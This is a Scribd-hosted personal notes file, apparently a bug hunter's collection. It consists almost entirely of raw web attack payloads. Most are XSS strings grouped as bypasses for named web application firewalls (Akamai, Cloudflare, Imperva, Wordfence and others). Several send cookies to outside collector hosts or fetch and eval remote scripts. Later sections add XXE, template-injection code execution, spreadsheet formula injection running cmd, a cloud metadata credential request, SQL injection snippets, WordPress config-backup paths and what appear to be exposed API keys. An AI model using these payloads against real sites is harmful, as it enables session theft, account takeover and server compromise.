Scribd
Upload
67 views23 pages

XSS Notes

Uploaded by

marvelironman3000
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
67 views23 pages

XSS Notes

Uploaded by

marvelironman3000
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 23

EICARdropper

https://thecyberpunker.com/blog/xss-payloads/

https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/

.*\.doit\.com$

https://translation.googleapis.com/language/translate/v2?key=AIzaSyBdJ88HN7LTGk1
2X5whfaVv8a5ozTEMP_k&target=language

https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=AIzaSyC5Lai
ovNX0mzDrDlOoLEKWCH2EWOSQohg

--------------------------------------------------------------------------------------------------------------
----------------------------

Most IMP XSS Payloads for Waf Bypass

--------------------------------------------------------------------------------------------------------------
----------------------------

Test<a href=javascript:alert(1)>click<a %00


src=\"&Tab;javascript:prompt(document.cookie)&Tab;\"%00onclick=alert(1)> fooo

ASP.NET payloads, by @shrekysec

/(A('onerror=%22alert%601%60%22testabcd))/

/Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders

(A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f

"></SCRIPT>--
!><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%27}};">});});})]--

Bypass Filter JavaScript source code

--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(100, 111, 99, 117, 109, 101, 110,


116, 46, 99, 111, 111, 107, 105, 101))</SCRIPT>
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--
></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoF
ocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--
></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoF
ocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

<button onClick={() => router.push("javascript:(alert)(3)")}>Click</button>

i2lte%22%3e%3cscript%3ealert(1)%3c%2fscript%3eayawz

<A/HRef=javascript:top/**/?.['ale'%2B'rt'](1)>

<</div>script</div>>confirm()<</div>/script</div>>

<svg/onload=window["al"+"ert"]`1337`>

<img src="image.png" usermap="#themap" width="99" height="99"><map


name="themap"><area coords="0,0,99,99" href="javascript:alert(1337)"></map>

<iframe src="javascript:setTimeout(function() {
/*\*/top['al'+'\u0065'+'rt'](document.domain)/*\*/ }, 5000);"></inpuT%3E;>

<inpuT autofocus oNFocus="setTimeout(function() {


/*\*/top['al'+'\u0065'+'rt'](document.domain)/*\*/ }, 5000);"></inpuT%3E;>

1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>


<!--
><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.coo
kie)%27>

<div
onpointerover="ja&#x76;ascr&#x69;pt:eva&#x6C;(decodeURICompo&#110;ent(String.f
romCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100,
111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26
%2300000000000000000041//

<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return
this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">

<video><source onerror="alert.constructor.constructor('return this')().alert('0f')">

<EMBED SRC="data:image/svg+xml;base64,PHN2Zy9vbmxvYWQ9d2luZG93WyJhbCIrI
mVydCJdYDEzMzdgPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBE
D>

<svg/onload=window[“al”+”ert”]`1337`>

<option><style></option></select><img src=x onerror=alert(1)></style>

<Svg Only=1 OnLoad=confirm(1)>

<input/onclick=alert(1)>

{{constructor.constructor('alert(document.cookie)')()}}
<image src/onerror=alert("Contact_Name")>

javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click


me</button><hvita onbeforetoggle=+a+b+c+ popover id=x>Hvita</hvita>")

<a href=\"javascript:alert(document.domain)\" onClick=\"var a =\"}, var a=5;


prompt(7);function a(){var b={c: {d:{//\"\">Click Me</a>

<A href=javascript:alert(1)>asd

<script>alert()<\/script>

"/><img src=u onerror="alert(document.domain)"<

<details ontoggle=alert(1)>

<a href="data:text/html,<script>alert(1)</script>">Click Here</a>

<a target="_blank" href="mailto:bar"onclick="alert(1)"<script>alert(1)</script>


onhower=alert(2)>Safe</a>

<p><a href="mailto:<svg/onload="alert(1)"//@x"><svg/onload="alert(1)"//@x</a></p>

<a target="_blank"
href="data:text/URI,javascript:alert(window.opener.document.cookie);">test</a>

<svg/onload=alert(/1/)>
<svg/on<script>load=prompt(document.domain);>”/>

<script>x=new
XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’
file:///etc/hosts’);x.send();</script>

<noscript>&amp;lt;p title=” &lt;/noscript&gt;&lt;style onload=


alert(document.domain)//&quot;&gt; *{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;}
&lt;/style&gt;

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;onclick=alert(1)">Click
me</a>

<script>history.pushState(0,0,’/i/am/somewhere_else’);</script><iframe
onload=”javascript:alert(document.domain)”>

<body onload="javascript:location.replace('\x2fportal\x2fc');">

--------------------------------------------------------------------------------------------------------------
----------------------------

AKamai Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<style>@keyframes
a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>

<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>

<svg><circle><set onbegin=prompt(1) attributename=fill>

<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`

<x onauxclick=import('//1152848220/')>click

<x onauxclick=a=alert,a(domain)>click

<x onauxclick=import('//1152848220/')>click

<x onauxclick=import('//xss/')>click

\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss

{{constructor.constructor(alert`1`)()}}

javascript:new%20Function`al\ert\`1\``;

https://twitter.com/xhzeem/status/1378316651431612422

https://twitter.com/xhzeem/status/1377992310974218245

<script>Object.prototype.BOOMR = 1;Object.prototype.url='https://portswigger-
labs.net/xss/xss.js'</script> -https://portswigger.net/web-security/cross-site-
scripting/cheat-sheet

"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hacke
rone.com/stealthy?x="+location)'>Click

--------------------------------------------------------------------------------------------------------------
----------------------------

Cloudflare Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<a"/onclick=(confirm)()>Click Here!

Dec: <svg onload=prompt%26%230000000040document.domain)>

Hex: <svg onload=prompt%26%23x000000028;document.domain)>

xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<a
href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Ta
b;t&Tab;(document.domain)&rpar;">X</a>

<--%253cimg%20onerror=alert(1)%20src=a%253e --!>

<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>

javascript:{ alert`0` }

1'"><img/src/onerror=.1|alert``>

<img src=x onError=import('//1152848220/')>

%2sscript%2ualert()%2s/script%2u

<svg on onload=(alert)(document.domain)>

<img ignored=() src=x onerror=prompt(1)>

<svg onx=() onload=(confirm)(1)>

“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;docume
nt.cookie%26%2300000000000000000041;

<svg on =i onload=alert(domain)

<svg/onload=location/**/='https://your.server/'+document.domain>

<svg onx=() onload=window.alert?.()>

test",prompt%0A/*HelloWorld*/(document.domain)

"onx+%00+onpointerenter%3dalert(domain)+x"

"><svg%20onload=alert%26%230000000040"1")>

%27%09);%0d%0a%09%09[1].find(alert)//

"><img src=1 onmouseleave=print()>

<svg on onload=(alert)(document.domain)>

<svg/on%20onload=alert(1)> (working)

<img/src=x onError="`${x}`;alert(`Ex.Mi`);">
--------------------------------------------------------------------------------------------------------------
----------------------------

Cloudfront Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x


onerror=javascript:alert(`cloudfrontbypass`)//'>

">'><details/open/ontoggle=confirm('XSS')>

6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/

&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;

--------------------------------------------------------------------------------------------------------------
----------------------------

Imperva Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme

tarun"><x/onafterscriptexecute=confirm%26lpar;)//

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+
v+h+n)(/infected/.source)" />click

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%
2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

<svg onload\r\n=$.globalEval("al"+"ert()");>

<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click

<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v
+h+n)(/infected/.source)" />tap

--------------------------------------------------------------------------------------------------------------
----------------------------

Incapsula Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>

<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b;


this['src']=a">

<audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]'


src=x>

<img/src=q onerror='new Function`al\ert\`1\``'>

<object
data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></obje
ct>

<svg onload\r\n=$.globalEval("al"+"ert()");>

[1].map(alert) or (alert)(1)

<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-
tarun/&rpar;">XXXXX</a>

[1].find(confirm)

<svg/onload=self[`aler`%2b`t`]`1`>

%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwv
c2NyaXB0Pg==%3E%3C/object%3E

'-[document.domain].map(alert)-'
--------------------------------------------------------------------------------------------------------------
----------------------------

Wordfence Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%25
2fscript%253ey6uu6

<meter onmouseover="alert(1)" -@manjith27945363

'">><div><meter onmouseover="alert(1)"</div>"

>><marquee loop=1 width=0 onfinish=alert(1)>

Wordfence 7.4.2

<a href=&#01javascript:alert(1)>

<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;
%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20cl
ick%20here</a>

--------------------------------------------------------------------------------------------------------------
----------------------------

For Slack

--------------------------------------------------------------------------------------------------------------
----------------------------

'"<b oncut=alert(3)>asd</b>>

slack '"><sript>var a= 4;</script> test '"><script>var a =1; </script>

'"><img src=u onerror=alert(21)>

<script>alert(1)</script>

'"><b>ssss<a href="google.com">ssss</a><img/src='u'/onerror=alert(7777)>
'"><b>ss<a href="google.com">ssss</a><img/src='u'/onerror=alert()>

"'><img src=u onerror=alert(1)>

<a href="https://www.google.com">Q1</a>

[click here](https://www.google.com"+onclick=alert(1)

--------------------------------------------------------------------------------------------------------------
----------------------------

Random Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

test1 <a href="data:text/html,<script>alert(1)</script>">Click Here</a>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(
String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"

<script/src=data:,alert()>

<marquee/onstart=alert()>

<video/poster/onerror=alert()>

<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<a onmouseover="alert(document.cookie)">xxs link</a>

<a onmouseover=alert(document.cookie)>xxs link</a>


<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=# onmouseover="alert('xxs')">

<IMG SRC= onmouseover="alert('xxs')">

<IMG onmouseover="alert('xxs')">

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

<IMG
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&
#108;&#101;&#114;&#116;&#40;

&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&
#0000105&#0000112&#0000116&#0000058&#0000097&

#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000
083&#0000083&#0000039&#0000041>

<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6
C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

<IMG SRC=" &#14; javascript:alert('XSS');">

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

<SCRIPT SRC=//ha.ckers.org/.j>

<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <

\";alert('XSS');//

</script><script>alert('XSS');</script>

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

<IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="livescript:[code]">

<BODY ONLOAD=alert('XSS')>

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

exp/*<A STYLE='no\xss:noxss("*//*");

xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">

¼script¾alert(¢XSS¢)¼/script¾

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html


base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-
image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\007
4\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->

<BASE HREF="javascript:alert('XSS');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT


SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>

<IMG
SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciou
scode">

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">


</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>


<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<A HREF="http://66.102.7.147/">XSS</A>

0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"

veris-->group<svg/onload=alert(/XSS/)//

#"><img src=M onerror=alert('XSS');>

element[attribute='<img src=x onerror=alert('XSS');>

[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]

%22;alert%28%27RVRSH3LL_XSS%29//

javascript:alert%281%29;

<w contenteditable id=x onfocus=alert()>

alert;pg("XSS")

<svg/onload=%26%23097lert%26lpar;1337)>

<script>for((i)in(self))eval(i)(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

<sCR<script>iPt>alert(1)</SCr</script>IPt>

<a
href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
test</a>

Vue JS
{{$emit.constructor`fetch(%27https://8v4y3qmogobk2g6bewqtqa83quwkk9.oastify.co
m%27,%20{%20method:%20%27POST%27,%20mode:%20%27no-
cors%27,%20body:%20document.cookie%20});`()}}

{{$emit.constructor`function b(){eval(this.responseText)};a=new
XMLHttpRequest();a.addEventListener("load", b);a.open("GET",
"//xss.report/s/sid0krypt");a.send()`()}}

{{_Vue.h.constructor('x','console.log("HI this is sid0krypt")')(this)}}

{{_Vue.h.constructor('x','console.log(x)')(this)}}

{{_Vue.h.constructor`alert(1)`()}}

{{$emit.constructor`alert(1)`()}}

${\"zjz\".toString().replace(\"j\", \"o\")}

${'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineB
yName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder;
x.command(\\\"ping\\\",\\\"szvta3myzyhu8udxodgghh6hm8sygn.burpcollaborator.net\\\
"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}

XML External Entity (XXE) Injection

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM

"https://zqtb5eufvtnznrn5l4il14ajeak28swh.oastify.com" > ]><test>&xxe</test><svg


xmlns="http://www.w3.org/2000/svg"><text font-size="16" x="10"

y="40">%26xxe1;</text></svg>, <?xml version="1.0" standalone="yes"?><!DOCTYPE


test [ <!ENTITY
xxe1 SYSTEM "http://geysgbf5kz1xoad21xx9yqo11s7iv7.burpcollaborator.net" > ]><svg

xmlns="http://www.w3.org/2000/svg"><text font-size="16" x="10"


y="40">%26xxe1;</text></svg>

*********HTML Injection*********

<a href=https://www.google.com>Link</a>

<a href=https://www.google.com>SLACK</a>

<a href=https://www.google.com>Click here</a>

*********Formula Injection*********

=calc|A0!Z

@calc|A0!Z

=cmd|' /C calc'!xxx

=cmd|'/Ccalc.exe'!z

=cmd|' /C notepad'!'A1'

DDE ("cmd";"/C calc";"!A0")A0

%0A-3+3+cmd|' /C calc'!D2

*********Command Execution*********

=WEBSERVICE("http://169.254.169.254/latest/meta-data/iam/security-credentials/"),

=WEBSERVICE("http://7498qogq07az5hxtjvy2ks36ixooce03.oastify.com"),

=INFO("/etc/passwd"),

=INFO("SYSTEM"),

=INFO("OSVERSION")

*********CSRF*********
http://gursevkalra.blogspot.com/2011/12/json-csrf-with-parameter-padding.html ----
JSON Padding

https://www.geekboy.ninja/blog/tag/json-csrf/ -------------------------------------JSON
Padding

JSON change into x-www-form-urlencoded

replace ":" with = and "," with &

ASP.NET Padding oracle

webresorece.axd url ma check karvu

web cache poissioning

coockie language:en

coockie language:pl 400 or 403

X-Forwared-Host:Blueinfy

pachi ni main request ma same j respons aave

try in GET Method

xmlrpc.php

<?xml version="1.0"?>

<methodCall>

<methodName>system.listMethods</methodName>

<params>

</params>

</methodCall>

https://kipwise.com/xmlrpc.php

<?xml version="1.0"?>
<methodCall>

<methodName>pingback.ping</methodName>

<params><params>

<value><string>http://</string></value>

</param><param><value><string>https://kipwish.com</string>

</value></param></params>

</methodCall>

curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL

--------------------------------------------------------------------------------------------------------------
----------------------------

Wordpress

--------------------------------------------------------------------------------------------------------------
----------------------------

/.htaccess

/wp-includes/

/wp-json/

/wp-content/uploads/

/wp-json/wp/v2/users

/wp-admin

/wp-admin/admin-ajax.php

/wp-json/?rest_route=/wp/v2/users/

/wp-config.php-backup /wp-config.php.orig

/.wp-config.php.swp

/wp-config-sample.php /wp-config.inc

/wp-config.old
/wp-config.txt

/wp-config.php.txt

/wp-config.php.bak

/wp-config.php.old

/wp-config.php.dist

/wp-config.php.inc

/wp-config.php.swp

/wp-config.php.html

/wp-config-backup.txt /wp-config.php.save

/wp-config.php~

/wp-config.php.original

/_wpeprivate/config.json

Wordpress Elementor Website Builder plugin <= 3.5.5 versions

#elementor-
action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidml
kZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZ
W50LmRvbWFpbikifX0=

https://www.cvedetails.com/ ------CVSS Score

{{5*5}}

{{7,*7}} ------Templet injection

https://autocode.com/guides/how-to-build-a-slack-bot/

x-forwarded-scheme: http

X-forwarded-host: host
X-Real-IP: 127.0.0.1

X-Client-IP: 120.0.0.1

X-Rewrite-URL: 127.0.0.1

X-Remote-IP: 127.0.0.1

X-Remote-Addr: 127.0.0.1

X-ProxyUser-Ip: 127.0.0.1

X-Originating-IP: 127.0.0.1

X-Original-URL: 127.0.0.1

X-Forwarded: 127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Custom-IP-Authorization: 127.0.0.1

True-Client-IP: 127.0.0.1

Intercom ChatBot Security Misconfiguration:

Intercom('boot', { email: '[email protected]' });

HelpCrunch ChatBot Security Misconfiguration

HelpCrunch('userAuth', {user_id: '[email protected]'});

Botframework (microsoft Azure)

WebChat.createDirectLine({userEmail:'[email protected]'});

https://calendar.google.com/calendar/b/1/r?cid=users_mail_address@company_name
.com

https://gitlab.com/dee-see/notkeyhacks
' waitfor delay'0:0:15'--

Error Base

union Base

Blind - Time and Boolean

Second order SQL Injection

Update user password='123' where username = 'xyz' and password = '123'

Update user password='123' where username ='xyz'-- and

Broken Access Control

Cryptographic Failuare

Injection

Insecure Designed

Security Misconfiguration

Vulnerable and outdated Componants

Authentication or identification Failure

Software Data and integrity Failuare

Security logging and Monitoring Failuare

SSFR

<?php system(id); ?>

Firebase:

https://blog.appsecco.com/exploiting-weak-configurations-in-google-identity-platform-
cbddbd0e71e3
https://hacktricks.boitatech.com.br/pentesting/pentesting-web/buckets/firebase-
database

__/firebase/init.json

GET /v1alpha/projects/-
/apps/1:361636954636:web:220eedf13a3a1aa0d36429/webConfig HTTP/2

Host: firebase.googleapis.com

X-Goog-Api-Key: AIzaSyB8KMna82QZS8RR9mIjO-xOzq19E4Vx-gg

If Find SSRF go for the https://www.youtube.com/watch?v=apzJiaQ6a3k

Hint: `whoami`.<burp>

You might also like